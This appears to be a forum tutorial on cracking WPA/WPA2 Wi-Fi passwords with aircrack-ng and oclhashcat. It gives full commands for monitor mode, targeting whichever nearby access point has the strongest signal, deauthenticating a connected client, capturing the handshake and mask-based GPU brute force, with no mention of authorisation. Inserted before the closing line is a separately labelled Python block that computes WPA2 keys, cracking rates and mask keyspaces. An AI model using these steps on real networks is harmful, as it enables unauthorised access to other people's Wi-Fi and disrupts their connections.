Use GPU to Speed Up WPA/WPA2 Password Cracking

Posted in #password, 8 years ago (edited)

There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphics Processing Unit) is way faster than a CPU in terms of computation, so we’ll use the power of the GPU to speed up WPA/WPA2 cracking. The tools used will be (available for both Windows and Linux):

  1. Aircrack-ng
  2. Oclhashcat

This guide assumes the following things:

  • wlan0 is a Wi-Fi interface
  • mon0 is the interface in monitor mode
  • <channel> refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5 is the MAC address of the target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d is the MAC of a client associated with the target AP (not real)
  • # (hash symbol) is used to mark the start of a command

Steps:

Open up a terminal.

Start by putting the Wi-Fi interface in monitor mode:

#airmon-ng start wlan0

This puts the Wi-Fi card in monitor mode and creates a new interface, mon0, to sniff traffic.

Then, start sniffing the air for all APs in the area:

#airodump-ng mon0

This will give you information about all APs in your vicinity. Select the one with the highest signal strength and focus on it.

Press Ctrl+C to stop the above command and type:

#airodump-ng -c <channel> --bssid 00:2d:37:4b:e4:d5 -w captured mon0

This command only sniffs for one specific AP:
-c tells which channel to sniff
--bssid is the MAC of the AP to target
-w tells it to write capture files with the given prefix (airodump-ng names them captured-01.cap and so on; the handshake saved there is used later to recover the password)
mon0 is the monitor interface

Notice the MAC addresses of the clients shown in the terminal; we’ll need one for the next step.

Now, open a second terminal and type:

#aireplay-ng -0 5 -a 00:2d:37:4b:e4:d5 -c cc:cc:4e:5b:d7:3d mon0

This command de-authenticates a client from its AP:
-0 tells how many deauth frames to send (in this case 5)
-a tells the MAC of the AP
-c tells the MAC of the client connected to the AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)
mon0 is our interface.

Once you see that airodump-ng shows Handshake captured in the upper-right corner, stop the process (otherwise, it keeps deauthing the clients).

Once the handshake has been captured and written (as a .cap file), clean the file using the following command:

#wpaclean clean_file.cap captured.cap

Here, clean_file.cap is the output file, and captured.cap is the input file (the file you captured).

Now, prepare the file for hashcat with:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from the previous step, and for_cat is the file for hashcat to use (aircrack-ng automatically adds the .hccap extension).

Now, begin the cracking process with:

#oclhashcat -m 2500 -a 3 --session=my_session /for_cat.hccap /mymask.hcmask

Here, -m 2500 tells it to crack WPA/WPA2
-a 3 tells it to use brute force or mask-based brute force (more on it later)
--session=my_session tells it to save the session (in case you plan to resume it later; it takes a very long time)
/for_cat.hccap is the path to your captured, cleaned and prepared hashcat file
/mymask.hcmask is the path to the mask file

Once it’s done, the recovered password will be stored in a .pot file (located in /usr/share/oclhashcat/ for Kali).

NOTES ON HASHCAT MASKS

The mask can take the following format:

  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for numbers
  • ?s for symbols (ASCII only I think)
  • ?a use all of the above characters

Thus, to create a mask, type in a blank file:

  • ?d?d?d?d?d?d?d?d for an 8-digit password
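A worked illustration of what the -m 2500 step and the mask notes above amount to, added here as example code that is not from the original post or from the hashcat project: it derives the WPA/WPA2 Pairwise Master Key exactly as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt), measures how many such derivations one CPU core manages, and works out how large the keyspace of a mask is and how long exhausting it would take at an assumed rate. The checked PMK is the published 802.11i test vector (passphrase "password", SSID "IEEE"); the 500,000 guesses per second GPU rate, the SSID `ExampleSSID` and the candidate strings are assumptions chosen for the demonstration. The point for anyone sizing a PSK policy: eight digits is 10^8 candidates and falls in minutes at that rate, eight characters from the full printable set is about 6.6 x 10^15, and every extra character multiplies the cost again.

```python
import hashlib
import time

# Sizes of hashcat's built-in mask charsets as listed in the tutorial.
# ?s is the 33 printable ASCII symbols; ?a is the union of the other four (95).
CHARSET_SIZES = {"u": 26, "l": 26, "d": 10, "s": 33, "a": 95}


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-PSK (IEEE 802.11i): PBKDF2-HMAC-SHA1 of
    the passphrase, salted with the SSID, 4096 iterations, 32 bytes. A cracker
    in -m 2500 mode has to do exactly this for every candidate before it can
    check the candidate against the captured handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat mask expands to.

    '?d?d?d?d' -> 10000; literal characters count as one choice; '??' is a
    literal question mark; an unknown '?x' token is rejected."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        token = mask[i + 1]
        if token != "?":
            if token not in CHARSET_SIZES:
                raise ValueError(f"unknown charset ?{token}")
            total *= CHARSET_SIZES[token]
        i += 2
    return total


def seconds_to_exhaust(mask: str, guesses_per_second: float) -> float:
    """Worst-case wall-clock time to try every candidate of a mask."""
    return mask_keyspace(mask) / guesses_per_second


def measure_pmk_rate(seconds: float = 0.5) -> float:
    """PMK derivations per second on one CPU core of this machine (a benchmark,
    so it varies by host). Compare with a GPU's -m 2500 rate to see why the
    tutorial offloads the work."""
    n = 0
    start = time.perf_counter()
    while time.perf_counter() - start < seconds:
        wpa2_pmk(f"candidate{n:08d}", "ExampleSSID")  # constructed inputs
        n += 1
    return n / (time.perf_counter() - start)


def exposure_table(masks, guesses_per_second):
    """(mask, keyspace, hours to exhaust) for each mask at an assumed rate."""
    return [(m, mask_keyspace(m), seconds_to_exhaust(m, guesses_per_second) / 3600)
            for m in masks]


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print("PMK:", wpa2_pmk("password", "IEEE").hex())
    print(f"CPU rate: {measure_pmk_rate():,.0f} PMK/s")
    # 500,000 PMK/s is an assumed GPU rate used only for illustration.
    for mask, space, hours in exposure_table(
            ["?d?d?d?d?d?d?d?d", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a",
             "?l?l?l?l?l?l?l?l?l?l?l?l"], 500_000):
        print(f"{mask:28} {space:>24,} {hours:>16,.1f} h")
```

The printed table is the practical check on a PSK policy: compare the hours column for the mask that describes your passphrases against the lifetime of the key, and remember that the rate column is per GPU, so an attacker with more hardware divides those hours accordingly.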

That’s it for this tutorial. 
